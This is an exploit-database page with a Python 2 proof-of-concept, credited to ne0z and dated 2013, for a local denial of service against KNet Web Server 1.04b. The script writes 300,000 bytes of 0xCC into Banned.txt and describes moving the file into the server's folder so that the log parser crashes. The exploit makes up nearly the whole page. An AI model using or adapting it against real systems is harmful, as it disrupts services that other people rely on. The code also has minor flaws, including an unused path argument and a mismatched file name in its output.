KNet Web Server 1.04b Denial Of Service

2013.06.09

Credit: ne0z

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

#!/usr/bin/python
# Exploit Title 	: KNet Web Server 1.04b Local Denial Of Service
# Date			: 6 Jun 2013
# Exploit Author	: ne0z
# Vendor Homepage	: http://www.hatsecure.com
# Version		: KNet Web Server 1.04b
# Tested on		: Windows XP Profesional SP3
#			  Windows XP Profesional SP2
#			  Windows 7 Ultimate
#
# Description :
# KNet Web Server have banned log with location C:\\Program Files\KNet\Banned.txt
# The parser of the banned log is vulnerable, when size of content in Banned.txt more than 200 KB
# and then KNet Web Server will crash.
#
# To generate Banned.txt just simple (Windows)
# $ python KNet_DOS_exploit.py C://
#
# Then move the file from C:\\Banned.txt to  C:\\Program Files\KNet\Banned.txt

import sys, os

arg = sys.argv

if (len(arg) < 1):
	print "KNet v1.04b - Local DOS exploit"
	print "Usage : "
	print "$ python "+arg[0]+" [PATH]"
	print "Example : "
	print "$ python "+arg[0]
	sys.exit(0)

try:
	print "[X] Generate payload"
	d = open("Banned.txt","w")
	payload = "\xCC" * 300000
	d.write(payload)
	d.close()
	print "[X] Saved to Banner.txt"
except:
	print "Error"

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

KNet Web Server 1.04b Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.